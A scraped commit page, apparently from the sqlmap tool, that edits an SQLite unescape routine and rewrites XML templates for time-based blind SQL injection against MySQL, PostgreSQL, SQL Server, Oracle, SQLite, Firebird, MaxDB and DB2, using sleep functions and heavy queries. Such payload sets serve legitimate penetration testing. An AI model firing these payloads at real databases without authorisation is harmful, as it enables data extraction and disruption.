Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 1928d54

Browse files
bdamelebdamele
committed
fixes issue #97 
1 parent 224bce8 commit 1928d54

2 files changed

Lines changed: 142 additions & 41 deletions

File tree

plugins/dbms/sqlite/syntax.py

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -15,6 +15,8 @@ def __init__(self):
1515

1616
@staticmethod
1717
def unescape(expression, quote=True):
18+
return expression
19+
1820
if isDBMSVersionAtLeast('3'):
1921
if quote:
2022
expression = expression.replace("'", "''")

xml/payloads.xml

Lines changed: 140 additions & 41 deletions
Original file line numberDiff line numberDiff line change
@@ -2838,37 +2838,38 @@ Formats:
28382838

28392839
<!-- Time-based blind tests - Parameter replace -->
28402840
<test>
2841-
<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
2841+
<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
28422842
<stype>5</stype>
28432843
<level>3</level>
28442844
<risk>1</risk>
28452845
<clause>1,2,3</clause>
28462846
<where>3</where>
2847-
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
2847+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
28482848
<request>
2849-
<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
2849+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
28502850
</request>
28512851
<response>
28522852
<time>[SLEEPTIME]</time>
28532853
</response>
28542854
<details>
28552855
<dbms>MySQL</dbms>
2856+
<dbms_version>&gt;= 5.0</dbms_version>
28562857
</details>
28572858
</test>
28582859

28592860
<test>
2860-
<title>MySQL time-based blind - Parameter replace (ELT)</title>
2861+
<title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
28612862
<stype>5</stype>
28622863
<level>4</level>
2863-
<risk>1</risk>
2864+
<risk>2</risk>
28642865
<clause>1,2,3</clause>
28652866
<where>3</where>
2866-
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
2867+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
28672868
<request>
2868-
<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
2869+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
28692870
</request>
28702871
<response>
2871-
<time>[SLEEPTIME]</time>
2872+
<time>[DELAYED]</time>
28722873
</response>
28732874
<details>
28742875
<dbms>MySQL</dbms>
@@ -2895,59 +2896,77 @@ Formats:
28952896
</test>
28962897

28972898
<test>
2898-
<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
2899+
<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
28992900
<stype>5</stype>
2900-
<level>3</level>
2901+
<level>5</level>
29012902
<risk>1</risk>
29022903
<clause>1,2,3</clause>
29032904
<where>3</where>
2904-
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2905+
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
29052906
<request>
2906-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2907+
<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
29072908
</request>
29082909
<response>
29092910
<time>[SLEEPTIME]</time>
29102911
</response>
29112912
<details>
29122913
<dbms>MySQL</dbms>
2913-
<dbms_version>&gt;= 5.0</dbms_version>
29142914
</details>
29152915
</test>
29162916

29172917
<test>
2918-
<title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
2918+
<title>MySQL time-based blind - Parameter replace (ELT)</title>
29192919
<stype>5</stype>
2920-
<level>4</level>
2921-
<risk>2</risk>
2920+
<level>5</level>
2921+
<risk>1</risk>
29222922
<clause>1,2,3</clause>
29232923
<where>3</where>
2924-
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2924+
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
29252925
<request>
2926-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2926+
<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
29272927
</request>
29282928
<response>
2929-
<time>[DELAYED]</time>
2929+
<time>[SLEEPTIME]</time>
29302930
</response>
29312931
<details>
29322932
<dbms>MySQL</dbms>
29332933
</details>
29342934
</test>
29352935

2936-
<!-- TODO: carry on editing these payloads -->
29372936
<test>
2938-
<title>PostgreSQL time-based blind - Parameter replace (GENERATE_SERIES)</title>
2937+
<title>PostgreSQL &gt; 8.1 time-based blind - Parameter replace</title>
29392938
<stype>5</stype>
29402939
<level>3</level>
2941-
<risk>2</risk>
2940+
<risk>1</risk>
29422941
<clause>1,2,3</clause>
29432942
<where>3</where>
2944-
<vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
2943+
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
29452944
<request>
2946-
<payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
2945+
<payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
29472946
</request>
29482947
<response>
29492948
<time>[SLEEPTIME]</time>
29502949
</response>
2950+
<details>
2951+
<dbms>PostgreSQL</dbms>
2952+
<dbms_version>&gt; 8.1</dbms_version>
2953+
</details>
2954+
</test>
2955+
2956+
<test>
2957+
<title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>
2958+
<stype>5</stype>
2959+
<level>4</level>
2960+
<risk>2</risk>
2961+
<clause>1,2,3</clause>
2962+
<where>3</where>
2963+
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2964+
<request>
2965+
<payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
2966+
</request>
2967+
<response>
2968+
<time>[DELAYED]</time>
2969+
</response>
29512970
<details>
29522971
<dbms>PostgreSQL</dbms>
29532972
</details>
@@ -2960,9 +2979,9 @@ Formats:
29602979
<risk>1</risk>
29612980
<clause>1,3</clause>
29622981
<where>3</where>
2963-
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
2982+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
29642983
<request>
2965-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
2984+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
29662985
</request>
29672986
<response>
29682987
<time>[SLEEPTIME]</time>
@@ -2974,16 +2993,37 @@ Formats:
29742993
</details>
29752994
</test>
29762995

2996+
<test>
2997+
<title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>
2998+
<stype>5</stype>
2999+
<level>4</level>
3000+
<risk>2</risk>
3001+
<clause>1,3</clause>
3002+
<where>3</where>
3003+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
3004+
<request>
3005+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>
3006+
</request>
3007+
<response>
3008+
<time>[DELAYED]</time>
3009+
</response>
3010+
<details>
3011+
<dbms>Microsoft SQL Server</dbms>
3012+
<dbms>Sybase</dbms>
3013+
<os>Windows</os>
3014+
</details>
3015+
</test>
3016+
29773017
<test>
29783018
<title>Oracle time-based blind - Parameter replace</title>
29793019
<stype>5</stype>
29803020
<level>3</level>
29813021
<risk>1</risk>
29823022
<clause>1,3</clause>
29833023
<where>3</where>
2984-
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
3024+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
29853025
<request>
2986-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
3026+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
29873027
</request>
29883028
<response>
29893029
<time>[SLEEPTIME]</time>
@@ -2994,42 +3034,101 @@ Formats:
29943034
</test>
29953035

29963036
<test>
2997-
<title>Microsoft Access time-based blind - Parameter replace</title>
3037+
<title>Oracle time-based blind - Parameter replace (heavy queries)</title>
29983038
<stype>5</stype>
2999-
<level>3</level>
3000-
<risk>1</risk>
3039+
<level>4</level>
3040+
<risk>2</risk>
30013041
<clause>1,3</clause>
30023042
<where>3</where>
3003-
<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
3043+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
30043044
<request>
3005-
<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
3045+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
30063046
</request>
30073047
<response>
3008-
<time>[SLEEPTIME]</time>
3048+
<time>[DELAYED]</time>
30093049
</response>
30103050
<details>
3011-
<dbms>Microsoft Access</dbms>
3051+
<dbms>Oracle</dbms>
30123052
</details>
30133053
</test>
30143054

30153055
<test>
3016-
<title>SAP MaxDB time-based blind - Parameter replace</title>
3056+
<title>SQLite &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
30173057
<stype>5</stype>
3018-
<level>3</level>
3019-
<risk>1</risk>
3058+
<level>4</level>
3059+
<risk>2</risk>
3060+
<clause>1,2,3</clause>
3061+
<where>3</where>
3062+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END))</vector>
3063+
<request>
3064+
<payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))))</payload>
3065+
</request>
3066+
<response>
3067+
<time>[DELAYED]</time>
3068+
</response>
3069+
<details>
3070+
<dbms>SQLite</dbms>
3071+
<dbms_version>&gt; 2.0</dbms_version>
3072+
</details>
3073+
</test>
3074+
3075+
<test>
3076+
<title>Firebird time-based blind - Parameter replace (heavy query)</title>
3077+
<stype>5</stype>
3078+
<level>5</level>
3079+
<risk>2</risk>
3080+
<clause>1,2,3</clause>
3081+
<where>3</where>
3082+
<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM])</vector>
3083+
<request>
3084+
<payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3)</payload>
3085+
</request>
3086+
<response>
3087+
<time>[DELAYED]</time>
3088+
</response>
3089+
<details>
3090+
<dbms>Firebird</dbms>
3091+
<dbms_version>&gt;= 2.0</dbms_version>
3092+
</details>
3093+
</test>
3094+
3095+
<test>
3096+
<title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>
3097+
<stype>5</stype>
3098+
<level>5</level>
3099+
<risk>2</risk>
30203100
<clause>1,3</clause>
30213101
<where>3</where>
3022-
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
3102+
<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
30233103
<request>
3024-
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
3104+
<payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
30253105
</request>
30263106
<response>
3027-
<time>[SLEEPTIME]</time>
3107+
<time>[DELAYED]</time>
30283108
</response>
30293109
<details>
30303110
<dbms>SAP MaxDB</dbms>
30313111
</details>
30323112
</test>
3113+
3114+
<test>
3115+
<title>IBM DB2 AND time-based blind (heavy query)</title>
3116+
<stype>5</stype>
3117+
<level>5</level>
3118+
<risk>2</risk>
3119+
<clause>1,2,3</clause>
3120+
<where>3</where>
3121+
<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
3122+
<request>
3123+
<payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
3124+
</request>
3125+
<response>
3126+
<time>[DELAYED]</time>
3127+
</response>
3128+
<details>
3129+
<dbms>IBM DB2</dbms>
3130+
</details>
3131+
</test>
30333132
<!-- End of time-based blind tests - Parameter replace -->
30343133

30353134

0 commit comments

Comments
 (0)